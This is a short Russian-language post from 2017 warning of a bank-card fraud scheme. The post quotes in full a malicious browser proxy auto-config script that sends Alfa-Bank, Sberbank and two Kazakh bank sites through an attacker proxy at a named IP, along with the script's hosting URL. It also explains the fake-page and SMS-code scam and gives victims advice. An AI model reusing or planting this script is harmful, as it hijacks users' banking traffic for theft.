Feb 16, 2017 11:13
Только что прервал операцию по выманиванию денег!
Люди попались опытные и не купились на звонок с просьбой сообщить СМС.
Как непонятно, но в настройках браузера, вкладка "Поключения", "настройка сети" появилась галочка "использовать сценарий подключения" и ссылка (не ходите туда) на сценарий minipoda .info/5m6T87/uHyW.eut, а там сценарий:
function FindProxyForURL(url,host){var N = "PROXY 178.32.10.70:8088";if (shExpMatch(host,"?nl?ne.??e?b?nk.r*")||shExpMatch(host,"cl?ck.al?ab?nk.r*")||shExpMatch(host,"*ome?ank.kz")||shExpMatch(host,"*yha?yk.kz")){return N;}return "DIRECT";}
То есть при попытке подключения к альфабанку и сбербанку, ну и еще к двум казахским банкам, данные идут через прокси 178.32.10.70; тот показывает картинку похожую на ту что дает банк (версия не свежая) и выдает таблицку что произошла ошибка и нужно аннулировать операцию и на телефон выслана СМС, просят дождаться звонка оператора.
На деле к этому моменту мошенники знают данные вашей карты и телефон, проводят свою операцию, то есть забирают деньги себе и звонят вам получить код подтверждения.
Причем сайт который выдается по защищенному соединению https имеет сертификат, который браузеры помечают как надежный, в то время как сертификаты нормальных банков пишется название банка. Обращайте внимание.
Никому не сообщайте по телефону то, что пришло вам в СМС, это не только про коды подтверждения, ваши СМС никого не касаются.
Карту лучше заблокировать и сделать новую.
мошенники